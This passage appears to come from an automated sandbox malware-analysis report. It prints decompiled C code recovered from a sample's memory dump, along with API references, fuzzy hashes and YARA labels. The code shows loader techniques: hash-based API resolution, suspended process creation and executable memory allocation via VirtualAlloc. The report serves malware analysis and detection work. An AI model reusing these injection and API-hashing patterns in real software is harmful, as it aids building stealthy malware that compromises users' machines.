								_t174 =  *0x8cb1d0; // 0x3277c8
								E008A8CC0(_t419 + 0x10c,  *((intOrPtr*)(_t174 + 8)));
							}
							_t281 = _t419 + 0x48;
							E008A8810(_t419 + 0x48, 0);
							_t177 = E008A9890(_t281, _t419 + 0x48, _t391, _t404, _t407, _t281, 0x8c9428,  *((intOrPtr*)(_t413 + 0x2c)));
							E008B0220(_t419 + 0x110,  *_t177, 0);
							E008A8CA0(_t281);
							E00898180(_t407);
						} else {
							__eflags = _t173 - 5;
							if(_t173 != 5) {
								__eflags = _t173 - 6;
								if(__eflags == 0) {
									_t328 = _t419 + 0xa4;
									 *_t328 = 0;
									 *((intOrPtr*)(_t328 + 4)) = 0;
									 *((intOrPtr*)(_t328 + 8)) = 0;
									 *((intOrPtr*)(_t328 + 0xc)) = 0;
									E008A5B60(_t280, _t328, _t404, _t407, __eflags);
									E00896740(_t419 + 0xa4);
									E008A1350(0x12);
									__eflags =  *(_t419 + 0xa8);
									if( *(_t419 + 0xa8) > 0) {
										_t283 = 0;
										__eflags = 0;
										do {
											_t192 = E008C2B00(_t419 + 0xa8, _t283);
											__eflags =  *((char*)(_t192 + 0x3c));
											if( *((char*)(_t192 + 0x3c)) == 0) {
												E00892A40(_t419 + 0x50, _t192);
												E008A8CA0(_t419 + 0x50);
											}
											_t283 = _t283 + 1;
											__eflags = _t283 -  *(_t419 + 0xa8);
										} while (_t283 <  *(_t419 + 0xa8));
									}
									E008C2970(_t280, _t419 + 0xa4, _t404);
									_t332 =  *(_t419 + 0xb0);
									__eflags =  *(_t419 + 0xb0);
									if( *(_t419 + 0xb0) != 0) {
										E00892A20(_t332, 1);
									}
								}
							} else {
								__eflags = _t280;
								if(_t280 == 0) {
									__eflags =  *0x8cb1cc - 1;
									if(__eflags <= 0) {
										L69:
										_t336 = _t419 + 0x18;
										 *_t336 = 0;
										 *((intOrPtr*)(_t336 + 4)) = 0;
										 *((intOrPtr*)(_t336 + 8)) = 0;
										 *((intOrPtr*)(_t336 + 0xc)) = 0;
										E008A5B60(_t280, _t336, _t404, _t407, __eflags);
										__eflags = ( *0x8cb029 & 0x000000ff) - 1;
										E00897DB0(_t419 + 0x18, 0 | ( *0x8cb029 & 0x000000ff) - 0x00000001 > 0x00000000);
										__eflags =  *0x8cb029 & 0x000000ff;
										if(( *0x8cb029 & 0x000000ff) != 0) {
											E008A1350(0x12);
											__eflags =  *(_t419 + 0x1c);
											if( *(_t419 + 0x1c) > 0) {
												_t284 = 0;
												__eflags = 0;
												do {
													_t202 = E008C2B00(_t419 + 0x1c, _t284);
													__eflags =  *((char*)(_t202 + 0x3c));
													if( *((char*)(_t202 + 0x3c)) == 0) {
														E00892A40(_t419 + 0x10, _t202);
														E008A8CA0(_t419 + 0x10);
													}
													_t284 = _t284 + 1;
													__eflags = _t284 -  *(_t419 + 0x1c);
												} while (_t284 <  *(_t419 + 0x1c));
											}
										}
										E008C2970(_t280, _t419 + 0x18, _t404);
										_t339 =  *(_t419 + 0x24);
										__eflags =  *(_t419 + 0x24);
										if( *(_t419 + 0x24) != 0) {
											E00892A20(_t339, 1);
										}
									} else {
										_t205 =  *0x8cb1d0; // 0x3277c8
										__eflags = ( *( *(_t205 + 4)) & 0x0000ffff) - 0x2d;
										if(__eflags != 0) {
											goto L69;
										}
									}
								}
							}
						}
						E008B8910(_t419 + 0x130, _t404, _t407);
						E008A8CA0(_t419 + 0x110);
						E008A8CA0(_t419 + 0x108);
						E008A7A70(_t419 + 0x128);
						__eflags = 0;
						return 0;
					} else {
						__eflags =  *0x8cb027 & 0x000000ff;
						if(( *0x8cb027 & 0x000000ff) == 0) {
							goto L52;
						} else {
							__eflags = _t280;
							if(_t280 != 0) {
								goto L52;
							} else {
								__eflags =  *((char*)(_t413 + 0xb)) - 0x20;
								_t402 =  ==  ? 0x7fe7dfa2 : 0xfd81b916;
								E008961B0(_t419 + 0x3c,  ==  ? 0x7fe7dfa2 : 0xfd81b916,  *((char*)(_t413 + 0xb)) - 0x20);
								E008A8810(_t419 + 0x18, 0x200);
								_t356 = E008A15C0(0xa1310f65, 0xc4d11e8a);
								__eflags = _t356;
								if(__eflags != 0) {
									_t242 =  *(_t419 + 0x18) >> 1;
									__eflags = _t242;
									_t402 =  *0x8cb1c4; // 0x890000
									 *_t356(_t402,  *(_t419 + 0x18), _t242);
								}
								_push(0x80);
								_push(0);
								E008BA4E0(_t419 + 0x10, __eflags,  *((intOrPtr*)(_t419 + 0x20)), 1);
								E008BA520(_t419 + 8, _t402, _t419 + 0x1c, 0);
								__eflags =  *((char*)(_t419 + 0x10));
								if( *((char*)(_t419 + 0x10)) != 0) {
									E008BBE30(_t419 + 0xc, _t407);
								}
								__eflags = 0;
								E008A8CA0(_t419);
								_t409 = _t419 + 0x1a0;
								_t416 = _t419 + 0x2c;
								while(1) {
									E008A0B70(_t409, 0, 0x44);
									 *((intOrPtr*)(_t419 + 0x1ac)) = 0x44;
									E008A0B70(_t416, 0, 0x10);
									_t419 = _t419 + 0x18;
									E008A8810(_t419 + 0x4c, 0);
									_t234 = E008A96D0(E008A96D0(E008B0220(_t419 + 0x50,  *((intOrPtr*)(_t419 + 0x40)), 0), 0x20), 0x22);
									_t235 =  *0x8cb1d0; // 0x3277c8
									E008A96D0(E008B0220(_t234,  *_t235, 0), 0x22);
									_t238 = E008A15C0(0xa1310f65, 0x643f303c);
									__eflags = _t238;
									if(_t238 != 0) {
										break;
									}
									E008A8CA0(_t419 + 0x48);
								}
								_push(_t416);
								_push(_t409);
								_push(0);
								_push(0);
								_push(4);
								_push(0);
								_push(0);
								_push(0);
								_push( *((intOrPtr*)(_t419 + 0x68)));
								_push( *((intOrPtr*)(_t419 + 0x60)));
								asm("int3");
								return _t238;
							}
						}
					}
				} else {
					E008B8910(_t419 + 0x130, _t403, _t407);
					E008A8CA0(_t419 + 0x110);
					E008A8CA0(_t419 + 0x108);
					E008A7A70(_t419 + 0x128);
					__eflags = 0;
					return 0;
				}
			}

0x0089543b
0x0089543d
0x00895440
0x00895451
0x00895457
0x00895459
0x00895459
0x0089545e
0x0089546f
0x00895483
0x00895487
0x0089549c
0x0089549c
0x008954a5
0x008954bf
0x008954d9
0x008954ec
0x008954f1
0x008954f3
0x00895506
0x0089550b
0x0089551c
0x00895525
0x00895538
0x00895546
0x00895552
0x00895563
0x0089556a
0x00895576
0x00895589
0x00895590
0x00895599
0x00895599
0x00895599
0x0089559c
0x008954f5
0x008954f5
0x008954f5
0x008955a8
0x008955b4
0x008955b9
0x008955bb
0x008955c4
0x008955c4
0x00000000
0x00000000
0x00000000
0x008954c1
0x008954c8
0x008955bd
0x008955bd
0x008955bd
0x008955d2
0x008955e8
0x008955f4
0x00895601
0x00895603
0x00895608
0x00000000
0x0089560f
0x00000000
0x0089560f
0x0089560f
0x00895622
0x0089562e
0x0089562e
0x00895630
0x00895637
0x00895637
0x0089563a
0x00000000
0x00000000
0x0089563f
0x00000000
0x00895641
0x00895641
0x0089564b
0x00000000
0x0089564d
0x00000000
0x0089564d
0x0089564b
0x00000000
0x0089563f
0x0089564f
0x00000000
0x0089564f
0x0089560f
0x0089560f
0x00895652
0x00895652
0x00895656
0x0089569c
0x0089569e
0x008956ab
0x008956ad
0x008956b3
0x008956ba
0x008956c0
0x008956c5
0x008956c8
0x008956cb
0x008956ce
0x008956de
0x008956e3
0x008956e8
0x008956f7
0x00895700
0x00895705
0x00895707
0x00895724
0x00895729
0x0089572f
0x0089572f
0x00895738
0x0089573d
0x0089573d
0x0089573f
0x0089574b
0x0089574d
0x00000000
0x00000000
0x00895754
0x00895759
0x0089575a
0x0089575d
0x00000000
0x00000000
0x00000000
0x0089575d
0x0089575f
0x00895766
0x00895770
0x00895783
0x0089578a
0x0089579b
0x0089579b
0x00895709
0x00895709
0x0089570e
0x00895714
0x00895714
0x0089571d
0x0089571d
0x008957a6
0x008957a6
0x008956ce
0x008956ba
0x008956ad
0x008957b2
0x008957b5
0x00895b3c
0x00895b3c
0x00895b41
0x00895b43
0x00895b54
0x00895b54
0x00895b59
0x00895b5b
0x00895e33
0x00895e35
0x00895e3a
0x00895e3d
0x00895e3f
0x00895e47
0x00895e49
0x00895e41
0x00895e41
0x00895e41
0x00895e4e
0x00895e4e
0x00895b61
0x00895b6e
0x00895b71
0x00895e0b
0x00895e10
0x00895e1a
0x00895e21
0x00895e22
0x00895e29
0x00895b77
0x00895b86
0x00895b86
0x00895b45
0x00895b45
0x00895b4b
0x00895b50
0x00895b52
0x00000000
0x00000000
0x00895b52
0x00895b92
0x00895b97
0x00895b99
0x00895baa
0x00895baa
0x00895baf
0x00895bb1
0x00895eb0
0x00895eb2
0x00895eb7
0x00895eba
0x00895ebc
0x00895ec4
0x00895ec6
0x00895ebe
0x00895ebe
0x00895ebe
0x00895ecb
0x00895ecb
0x00895bb7
0x00895bc4
0x00895bc7
0x00895e62
0x00895e68
0x00895e73
0x00895e74
0x00895e7d
0x00895e84
0x00895e89
0x00895e8b
0x00895e93
0x00895e9e
0x00895ea6
0x00895ea6
0x00895bcd
0x00895bcf
0x00895be8
0x00895bf1
0x00895bf5
0x00895bf7
0x00895c05
0x00895c06
0x00895c12
0x00895c12
0x00895b9b
0x00895b9b
0x00895ba1
0x00895ba6
0x00895ba8
0x00000000
0x00000000
0x00895ba8
0x00895c1e
0x00895c21
0x00895c24
0x00895d87
0x00895d8e
0x00895ed5
0x00895ee4
0x00895ee4
0x00895d94
0x00895d9c
0x00895daa
0x00895dbd
0x00895dc4
0x00895dc9
0x00895c2a
0x00895c2a
0x00895c2d
0x00895cf0
0x00895cf3
0x00895cfb
0x00895d02
0x00895d04
0x00895d07
0x00895d0a
0x00895d0d
0x00895d1b
0x00895d25
0x00895d2a
0x00895d32
0x00895d34
0x00895d34
0x00895d36
0x00895d3e
0x00895d43
0x00895d47
0x00895d4f
0x00895d58
0x00895d58
0x00895d5d
0x00895d5e
0x00895d5e
0x00895d36
0x00895d6e
0x00895d73
0x00895d7a
0x00895d7c
0x00895d80
0x00895d80
0x00895d7c
0x00895c33
0x00895c33
0x00895c35
0x00895c3b
0x00895c42
0x00895c58
0x00895c5a
0x00895c5e
0x00895c60
0x00895c63
0x00895c66
0x00895c69
0x00895c77
0x00895c81
0x00895c8d
0x00895c8f
0x00895c96
0x00895c9b
0x00895ca0
0x00895ca2
0x00895ca2
0x00895ca4
0x00895ca9
0x00895cae
0x00895cb2
0x00895cba
0x00895cc3
0x00895cc3
0x00895cc8
0x00895cc9
0x00895cc9
0x00895ca4
0x00895ca0
0x00895cd3
0x00895cd8
0x00895cdc
0x00895cde
0x00895ce6
0x00895ce6
0x00895c44
0x00895c44
0x00895c4f
0x00895c52
0x00000000
0x00000000
0x00895c52
0x00895c42
0x00895c35
0x00895c2d
0x00895dd5
0x00895de1
0x00895ded
0x00895df9
0x00895dfe
0x00895e0a
0x008957bb
0x008957c2
0x008957c4
0x00000000
0x008957ca
0x008957ca
0x008957cc
0x00000000
0x008957d2
0x008957dc
0x008957e4
0x008957e7
0x008957f5
0x00895809
0x0089580b
0x0089580d
0x00895813
0x00895813
0x0089581a
0x00895821
0x00895821
0x00895823
0x00895828
0x00895834
0x00895844
0x00895849
0x0089584e
0x00895854
0x00895854
0x00895859
0x0089585e
0x00895863
0x0089586a
0x0089586e
0x00895873
0x00895878
0x00895888
0x0089588d
0x00895896
0x008958b7
0x008958be
0x008958d0
0x008958df
0x008958e4
0x008958e6
0x00000000
0x00000000
0x00895996
0x00895996
0x008958ec
0x008958ed
0x008958ee
0x008958ef
0x008958f0
0x008958f2
0x008958f3
0x008958f4
0x008958f5
0x008958f9
0x008958fd
0x008958fe
0x008958fe
0x008957cc
0x008957c4
0x00895658
0x0089565f
0x0089566b
0x00895677
0x00895683
0x00895688
0x00895694
0x00895694

APIs

LoadLibraryW.KERNEL32(00000000,00000001,A1310F65,F3AF54A7,A1310F65,F3AF54A7), ref: 0089562E

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 828330fcbe67911e877a4edfd70c1f00bc96bb594c8ddf6f541381a5c7c2346f
Instruction ID: 4de5cc1fdc00a9c47e1d6e4de5f88959efd15be0aede1a62f208c1d6683aa7b4
Opcode Fuzzy Hash: 828330fcbe67911e877a4edfd70c1f00bc96bb594c8ddf6f541381a5c7c2346f
Instruction Fuzzy Hash: EF2195315087849BDB37BB68C862BEEB3E1FF96300F484429E586D6592EF309945C753

Uniqueness

Uniqueness Score: -1.00%

Function 008A1030, Relevance: 1.5, APIs: 1, Instructions: 36
memoryCOMMON

Download Yara Rule

C-Code - Quality: 33%

			E008A1030() {
				void* _v20;
				void* _t4;
				intOrPtr* _t9;
				void* _t11;

				if( *0x8cb1e0 == 0xe99c89bf) {
					_t9 = E008A15C0(0x588ab3ea, 0xc0b67de0);
					 *0x8cb1e4 = E008A15C0(0x588ab3ea, 0x82d274c4);
					if( *0x8cb1e0 == 0xe99c89bf) {
						 *_t9(2, 0, 0, 0, 0, 0); // executed
						 *0x8cb1e0 = 0;
					}
				}
				_t4 = E008A15C0(0x588ab3ea, 0x996e050f);
				if(_t4 == 0) {
					return 0;
				} else {
					_push( *((intOrPtr*)(_t11 + 8)));
					_push(8);
					_push( *0x8cb1e0);
					asm("int3");
					return _t4;
				}
			}

0x008a103b
0x008a1073
0x008a1084
0x008a1093
0x008a109e
0x008a10a0
0x008a10a0
0x008a1093
0x008a1047
0x008a104e
0x008a1063
0x008a1050
0x008a1050
0x008a1054
0x008a1056
0x008a105c
0x008a105d
0x008a105d

APIs

RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,588AB3EA,82D274C4,588AB3EA,C0B67DE0,?,008A8864,00000000,00000000,00000000,?), ref: 008A109E

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: ed72a52ec60d47e5d87ac6ce6d4302fa6c9df68a81c63e94a408e4df70566385
Instruction ID: 71dea1735ed28526f10d724bf93ad8faf1ae511e46d3e704f2d2243aeeae8aaf
Opcode Fuzzy Hash: ed72a52ec60d47e5d87ac6ce6d4302fa6c9df68a81c63e94a408e4df70566385
Instruction Fuzzy Hash: 89F08C38400A88BEFA209BA69C1FE7A36E8FB01394F080427F605D5991FB3085608326

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 10002140, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 20%

			E10002140() {
				intOrPtr _t1;

				_t1 =  *0x10009d30; // 0x3c400
				 *0x10009d9c = _t1;
				 *0x10009da0 = GetProcAddress(LoadLibraryA("kernel32"), "VirtualAlloc");
				_push(0x40);
				_push(0x3000);
				_push( *0x10009d9c);
				_push( *0x10009d7c);
				_push( *0x10009da0);
				_push(E100021B7);
				_push( *0x10009da0);
				return 0x40;
			}

0x10002143
0x10002148
0x10002164
0x1000216e
0x10002174
0x10002175
0x1000217b
0x10002181
0x100021b0
0x100021b5
0x100021b6

APIs

LoadLibraryA.KERNEL32(kernel32), ref: 10002157
GetProcAddress.KERNEL32(00000000,?,1000271F,00001EB1), ref: 1000215E

Strings

kernel32, xrefs: 10002152
VirtualAlloc, xrefs: 1000214D

Memory Dump Source

Source File: 00000004.00000002.2414838793.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.2414833027.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2414845005.0000000010004000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2414850179.0000000010007000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2414857446.0000000010008000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2414864270.000000001000A000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: VirtualAlloc$kernel32
API String ID: 2574300362-401495515
Opcode ID: cbfbe2b16eeeaf55bed70a1d2f924d838dbfb4fca7c25281cf176b66195a9917
Instruction ID: 9fdde6ceb45ff9c80efd86e2d249e6e20355c807403ab681b38dcf293fca579e
Opcode Fuzzy Hash: cbfbe2b16eeeaf55bed70a1d2f924d838dbfb4fca7c25281cf176b66195a9917
Instruction Fuzzy Hash: A4E01AB11A4220AFFB859BA8CC84E613BB9F34C2C1B50402BF689D226CD731A910CB15

Uniqueness

Uniqueness Score: -1.00%

Function 00891570, Relevance: 3.6, Strings: 2, Instructions: 1143
COMMONCrypto

Download Yara Rule

C-Code - Quality: 41%

			E00891570(signed int __ecx, void* __edx, void* __eflags) {
				char _v44;
				intOrPtr _v48;
				char _v56;
				char _v72;
				char _v80;
				void* _v116;
				char _v124;
				char _v128;
				signed int _v136;
				char _v140;
				char _v144;
				void* _v148;
				char _v152;
				signed int _v156;
				signed int _v160;
				intOrPtr _v164;
				signed int _v168;
				char _v172;
				char _v176;
				void* _v184;
				void* _v188;
				void* _v192;
				char _v196;
				void* _v212;
				char _v216;
				void* _v220;
				char _v224;
				char _v228;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				void* _v252;
				intOrPtr _v276;
				char _v280;
				char _v288;
				void* _v292;
				char _v296;
				void* _v300;
				intOrPtr _v308;
				signed int _v328;
				void* _v348;
				void* _v352;
				char _v356;
				char _v368;
				char _v372;
				void* _v380;
				char _v384;
				char _v388;
				char _v392;
				char _v396;
				char _v400;
				char _v408;
				char _v412;
				char _v416;
				char _v420;
				char _v428;
				char _v432;
				char _v436;
				char _v444;
				char _v448;
				char _v452;
				char _v456;
				char _v460;
				char _v464;
				char _v468;
				char _v472;
				char _v476;
				char _v480;
				char _v484;
				char _v488;
				char _v492;
				char _v496;
				char _v500;
				char _v504;
				char _v508;
				char _v512;
				char _v516;
				char _v520;
				char _v524;
				char _v528;
				char _v532;
				char _v536;
				char _v540;
				char _v544;
				char _v548;
				char _v552;
				char _v556;
				char _v560;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				char _v580;
				char _v584;
				char _v588;
				void* _v592;
				void* _v596;
				void* _v600;
				void* _v604;
				intOrPtr _v608;
				void* _v612;
				void* _v616;
				void* _v620;
				void* _v624;
				void* _v628;
				void* _v632;
				void* _v636;
				void* _v640;
				void* _v644;
				void* _v648;
				void* _v668;
				void* _v1676;
				void* _v1684;
				void* _v1692;
				void* _v1708;
				intOrPtr _v1800;
				intOrPtr _v1804;
				intOrPtr _v1808;
				intOrPtr _v1812;
				intOrPtr _v1816;
				void* _v1820;
				void* _v1824;
				void* _v1828;
				void* _v1832;
				void* _v1836;
				void* _v1840;
				void* _v1844;
				void* _v1848;
				void* _v1852;
				void* _v1856;
				void* _v1860;
				void* _v1864;
				void* _v1868;
				void* _v1872;
				void* _v1876;
				void* _v1956;
				void* _v1960;
				void* _v2760;
				void* _v2764;
				void* _v2768;
				void* _v2772;
				void* _v2776;
				intOrPtr _v2820;
				signed int _v2860;
				void* _v2864;
				intOrPtr _v2868;
				intOrPtr _v2872;
				intOrPtr _v2876;
				void* _v2880;
				intOrPtr _v2884;
				void* _v2888;
				void* _v2896;
				void* _v2904;
				intOrPtr _v2908;
				void* _v2912;
				intOrPtr _v2916;
				void* _v2920;
				void* _v2928;
				void* _v2936;
				void* _v2940;
				void* _v2944;
				void* _v2948;
				void* _v2952;
				void* _v2956;
				char _v2960;
				void* _v2964;
				void* _v2968;
				void* _v2976;
				void* _v2984;
				signed int _v2988;
				signed int _v2992;
				void* _v3000;
				void* _v3020;
				void* _v3048;
				void* _v3052;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t313;
				signed int _t317;
				void* _t322;
				signed int _t325;
				signed int _t329;
				void* _t345;
				intOrPtr _t368;
				signed int _t370;
				signed int _t379;
				signed int _t383;
				signed int _t387;
				signed int _t562;
				signed int _t571;
				signed int _t585;
				signed int _t586;
				signed int _t595;
				signed int _t599;
				signed int _t620;
				signed int _t621;
				signed int _t782;
				void* _t800;
				signed int _t803;
				void* _t812;
				signed int _t817;
				signed int _t820;
				signed int _t831;
				void* _t833;
				void* _t834;
				void* _t835;
				void* _t838;

				_t827 = _t831;
				_push(_t800);
				_t833 = (_t831 & 0xffffffe0) - 0xad4;
				_t595 = __ecx;
				_t812 = __edx;
				E008BB6B0( &_v44,  *((intOrPtr*)(__ecx + 0x1c)));
				_push(0);
				E008C1C80(__ecx,  &_v72, _t800, __edx, _t831, _v48);
				E008B0B10( &_v56);
				if(E008C1F90(_t595,  &_v80, _t831, 0) != 0) {
					_push(0);
					E008B9350( &_v168);
					_push(0);
					E008B9350( &_v156);
					_push(0);
					E008B9350( &_v144);
					__eflags = _t595;
					_t11 = _t595 + 0xc; // 0xc
					_t612 =  ==  ? _t595 : _t11;
					_t313 = E008BBEA0( ==  ? _t595 : _t11, 0x1d, _t812);
					__eflags = _t313;
					if(_t313 != 0) {
						_push(0x1fffff);
						E008BEA50(_t595);
					}
					__eflags = _t595;
					_t12 = _t595 + 0xc; // 0xc
					_t802 =  ==  ? _t595 : _t12;
					_push(0);
					_push(0);
					_t803 =  *( ==  ? _t595 : _t12);
					E008C2060(_t595,  &_v228, _t803, _t812);
					 *(_t833 + 0xa78) = 0;
					asm("pxor xmm0, xmm0");
					_v128 = 1;
					asm("movq [esp+0xa90], xmm0");
					 *((intOrPtr*)(_t833 + 0xa90)) = E008B9650(_t812);
					_t317 = E008A15C0(0x588ab3ea, 0xa65417fb);
					__eflags = _t317;
					if(_t317 == 0) {
						 *(_t833 + 0x40) = 0;
						E008BBDC0(_t833 + 0xa7c,  *((intOrPtr*)(_t833 + 0xa8c)));
						__eflags =  *(_t833 + 0x40);
						if( *(_t833 + 0x40) == 0) {
							_v124 = 0;
							_v136 = 0;
							_v140 = 0;
							 *((intOrPtr*)(_t833 + 0xa84)) = 0;
							_t782 = E008A15C0(0x588ab3ea, 0x9cac62c7);
							__eflags = _t782;
							if(_t782 != 0) {
								 *(_t833 + 0x40) =  *(_t833 + 0xa78);
								 *(_t833 + 0x44) = _t782;
								_t322 = E008B9650(_t812);
								_t783 =  *(_t833 + 0x44);
								 *(_t833 + 0x50) = _t803;
								_t803 =  *(_t833 + 0x78);
								_t325 =  *( *(_t833 + 0x44))( *((intOrPtr*)(_t833 + 0x64)), 0xffffffff, _t833 + 0xaa0, 0, _t322,  &_v140,  &_v124, 2, 0, 4);
								__eflags = _t325;
								if(_t325 == 0) {
									goto L11;
								} else {
									__eflags = _v168;
									if(_v168 != 0) {
										goto L53;
									}
									goto L54;
								}
							} else {
								L11:
								 *(_t833 + 0x40) = E008B9640(_t812, 0);
								E008A0C10(_v164,  *(_t833 + 0x44), E008B9650(_t812));
								_t833 = _t833 + 0xc;
								_t329 = E008A15C0(0x588ab3ea, 0xa8f2638d);
								__eflags = _t329;
								if(_t329 == 0) {
									 *(_t833 + 0x4bc) = 0;
									_t620 = E008A15C0(0x588ab3ea, 0xea812079);
									__eflags = _t620;
									if(_t620 == 0) {
										L17:
										_v140 =  *(_t833 + 0x4bc);
										_t621 = E008A15C0(0x588ab3ea, 0xea812079);
										__eflags = _t621;
										if(_t621 == 0) {
											L26:
											_v136 =  *(_t833 + 0x4bc);
											__eflags = _v168;
											if(_v168 != 0) {
												E008BBE30( &_v172, _t812);
											}
											__eflags = E008BED90(_t595) - 0x20;
											_push(0);
											_t336 =  ==  ? 0x8c8600 : 0x8c8c40;
											_push( ==  ? 0x8c8600 : 0x8c8c40);
											E008A1BA0(E008BED90(_t595) - 0x20, _t833 + 0xac0);
											E008B9B10( &_v240);
											E008B0B10( &_v124);
											E008B9670( &_v228, E008B9A90( &_v244, _t812));
											 *(_t833 + 0x40) = E008B9640( &_v248, 0);
											E0089AC20(_t827,  *(_t833 + 0x44), E008B9640( &_v236, 0),  *((intOrPtr*)(_t833 + 0xab8)));
											_t834 = _t833 + 8;
											_t345 = E008BED90(_t595);
											__eflags = _t345 - 0x20;
											if(_t345 == 0x20) {
												E008A0B70(_t834 + 0x40, 0, 0x47c);
												_t835 = _t834 + 0xc;
												 *((intOrPtr*)(_t835 + 0x44c)) = E008B9650(_t812);
												 *((intOrPtr*)(_t835 + 0x444)) = 0x56473829;
												 *((intOrPtr*)(_t835 + 0x46c)) = E008A15C0(0x588ab3ea, 0x9cac62c7);
												 *((intOrPtr*)(_t835 + 0x470)) = E008A15C0(0x588ab3ea, 0xa8f2638d);
												 *((intOrPtr*)(_t835 + 0x474)) = E008A15C0(0x588ab3ea, 0xd8cc7390);
												 *((intOrPtr*)(_t835 + 0x478)) = E008A15C0(0x588ab3ea, 0xd16c9225);
												 *((intOrPtr*)(_t835 + 0x47c)) = E008A15C0(0x588ab3ea, 0x649746ec);
												 *((intOrPtr*)(_t835 + 0x480)) = E008A15C0(0x588ab3ea, 0xe5ef1afa);
												 *((intOrPtr*)(_t835 + 0x484)) = E008A15C0(0x588ab3ea, 0x58d59bc9);
												 *((intOrPtr*)(_t835 + 0x488)) = E008A15C0(0x588ab3ea, 0x35b39b2b);
												 *((intOrPtr*)(_t835 + 0x48c)) = E008A15C0(0x588ab3ea, 0xe9fbf3a8);
												 *((intOrPtr*)(_t835 + 0x490)) = E008A15C0(0x588ab3ea, 0xbcd9ca71);
												 *((intOrPtr*)(_t835 + 0x494)) = E008A15C0(0x588ab3ea, 0x4faea65b);
												 *((intOrPtr*)(_t835 + 0x498)) = E008A15C0(0x588ab3ea, 0xc0b67de0);
												 *((intOrPtr*)(_t835 + 0x49c)) = E008A15C0(0x588ab3ea, 0x996e050f);
												 *((intOrPtr*)(_t835 + 0x4a0)) = E008A15C0(0x588ab3ea, 0x81c9e4a7);
												 *((intOrPtr*)(_t835 + 0x4a4)) = E008A15C0(0x588ab3ea, 0x97abe05f);
												_v1800 = E008A15C0(0x588ab3ea, 0x82d274c4);
												_v1804 = E008A15C0(0xa1310f65, 0x77be1f6);
												_v1808 = E008A15C0(0xa1310f65, 0xe2d27ff4);
												_v1812 = E008A15C0(0xa1310f65, 0x69121530);
												_t368 = E008A15C0(0xa1310f65, 0xf1c64384);
												 *((intOrPtr*)(_t835 + 0x464)) = _v308;
												_v1816 = _t368;
												 *((intOrPtr*)(_t835 + 0x468)) =  *((intOrPtr*)(_t835 + 0xa98));
												E008B9710( &_v368,  &_v2960, 0x47c);
												_push(_t835 + 0xa60);
												_push(0x4bc);
												_t785 =  &_v392;
												_t370 = E0089E900(_t595,  &_v392);
											} else {
												E008A0B70(_t834 + 0x4c0, 0, 0x4f0);
												_t838 = _t834 + 0xc;
												_v608 = E008B9650(_t812);
												 *((intOrPtr*)( &_v384 - 0xe8)) = 0x56473829;
												_push(0);
												E008B9350( &_v384);
												 *((intOrPtr*)(_t838 + 0x40)) = 0x3b4caff7;
												asm("pxor xmm0, xmm0");
												asm("movq [esp+0x48], xmm0");
												E008B9670( &_v388, E008B9650( &_v388) + 0x10);
												E008B9640( &_v392, E008B9650( &_v392) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0x9cac62c7;
												asm("movq [esp+0x48], xmm1");
												E008B9670( &_v396, E008B9650( &_v396) + 0x10);
												E008B9640( &_v400, E008B9650( &_v400) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												_v2820 = 0xa8f2638d;
												asm("movq [esp+0x48], xmm1");
												E008B9670(_t838 + 0x9b4, E008B9650(_t838 + 0x9b0) + 0x10);
												E008B9640( &_v408, E008B9650( &_v408) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0xd8cc7390;
												asm("movq [esp+0x48], xmm1");
												E008B9670( &_v412, E008B9650( &_v412) + 0x10);
												E008B9640( &_v416, E008B9650( &_v416) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0xd16c9225;
												asm("movq [esp+0x48], xmm1");
												E008B9670( &_v420, E008B9650( &_v420) + 0x10);
												E008B9640(_t838 + 0x9b4, E008B9650(_t838 + 0x9b0) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0x649746ec;
												asm("movq [esp+0x48], xmm1");
												E008B9670( &_v428, E008B9650( &_v428) + 0x10);
												E008B9640( &_v432, E008B9650( &_v432) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0xe5ef1afa;
												asm("movq [esp+0x48], xmm1");
												E008B9670( &_v436, E008B9650( &_v436) + 0x10);
												E008B9640(_t838 + 0x9b4, E008B9650(_t838 + 0x9b0) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												_v2860 = 0x58d59bc9;
												asm("movq [esp+0x48], xmm1");
												E008B9670( &_v444, E008B9650( &_v444) + 0x10);
												E008B9640( &_v448, E008B9650( &_v448) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												_v2868 = 0x35b39b2b;
												asm("movq [esp+0x48], xmm1");
